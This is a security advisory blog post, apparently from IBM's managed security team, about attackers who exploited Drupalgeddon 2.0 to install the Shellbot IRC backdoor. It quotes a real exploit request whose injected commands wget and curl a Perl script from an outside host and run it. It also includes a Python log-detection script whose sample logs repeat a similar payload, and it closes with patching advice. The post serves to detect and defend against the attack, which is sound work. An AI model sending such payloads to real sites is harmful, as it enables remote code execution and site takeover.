IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.
This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?
What Is Drupal, and Why Is It a Target?
Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.
CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.
To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.
ShellBot Attacks Open Backdoors With Drupalgeddon 2.0
In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:
| IP Address | Suspicious Request |
| --- | --- |
| 18.104.22.168 | /?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 22.214.171.124 /lip;perl;cd /tmp;curl -O 126.96.36.199 /lip;perl lip;rm -rf lip*&name[#post_render]=passthru |
Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.
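The request above abuses Drupal Form API render properties (the `name[#...]` keys) to reach a shell through `passthru`. The following is an added detection example, not code from the original investigation: it parses combined-format web server access log lines (constructed samples, with documentation-range IPs), URL-decodes the request target and flags any decoded `#property` key, which a browser never sends, together with shell-staging tokens such as `wget` or `cd /tmp`. The list of Form API property names and the severity rule are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Drupal Form API property names (assumed set). A literal '#' key in a query
# string or form field is how CVE-2018-7600 / CVE-2018-7602 reach the renderer;
# browsers never send '#' in a request line, so a decoded '#<property>' is a
# strong signal regardless of the rest of the request.
FORM_API_KEYS = {"post_render", "pre_render", "lazy_builder", "markup",
                 "access_callback", "type", "value", "children"}
FORM_KEY_RE = re.compile(r"#([a-z_]+)")
# Shell-staging tokens of the kind seen in the campaign's injected command.
SHELL_RE = re.compile(r"(?:^|[;&|\s=])(?:wget|curl|perl|passthru)\b|cd\s+/tmp", re.I)
# Combined-format access log line (standard Apache/nginx layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) ')

def classify(line):
    """Return an alert dict for a Drupalgeddon-style request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice: scanners sometimes double-encode (%2523 -> %23 -> #).
    decoded = unquote_plus(unquote_plus(m["target"]))
    path, _, query = decoded.partition("?")
    keys = {k.lower() for k in FORM_KEY_RE.findall(query)} & FORM_API_KEYS
    if not keys:
        return None
    return {
        "ip": m["ip"], "time": m["ts"], "path": path,
        "form_keys": sorted(keys),
        "shell_cmd": bool(SHELL_RE.search(query)),
        "status": int(m["status"]),
        # A 2xx on an exploit attempt means the callback probably ran.
        "severity": "critical" if m["status"].startswith("2") else "medium",
    }

def scan(lines):
    return [a for a in (classify(l) for l in lines) if a]

# Constructed sample log lines (not from the original investigation).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Aug/2018:10:01:02 +0000] "POST /?q=user/password&name%5B%23type%5D=markup'
    '&name%5B%23markup%5D=cd+/tmp;wget+192.0.2.10/lip;perl+lip&name%5B%23post_render%5D=passthru'
    ' HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Aug/2018:10:01:05 +0000] "GET /user/password HTTP/1.1" 200 3210 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Aug/2018:10:01:09 +0000] "POST /user/password?name=alice HTTP/1.1" 403 120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Aug/2018:10:02:30 +0000] "GET /user/register?element_parents=account/mail/%2523value&ajax_form=1 HTTP/1.1" 404 99 "-" "x"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Ordinary password-reset traffic to /user/password produces no alert; only requests carrying decoded Form API keys do, so the rule can run over high-volume logs without tuning on the command text.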
Scan and Deploy
Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both of these flaws have been patched, but the vulnerabilities persist because users delay patching and upgrading.
As we continued to look into the attack, we saw the attackers scan vulnerable websites for the /user/register and /user/password pages during the installation phase, trying to brute-force their way in with previously discovered user access details while attempting to “wget” the Perl script for Backdoor.Shellbot.
When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.
The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.
Shellbot itself is an old piece of code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files on the attacker’s command, and change the endpoint’s settings, to name a few capabilities.
Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, at the height of the Apache Struts exploitation wave (CVE-2017-5638), ShellBot was packaged as the C&C component of the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.
Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:
- Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
- Host phishing campaigns;
- Distribute phishing email spam;
- Carry out various types of DDoS attacks; and
- Exfiltrate data via a PHP module to a predetermined email address.
Attackers Bank on Old Vulnerabilities
It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.
Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:
- Use updated protocols such as HTTPS and upgrade if need be.
- Update CMSs to the most recent version and use all available patches.
- Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
- Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.
Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.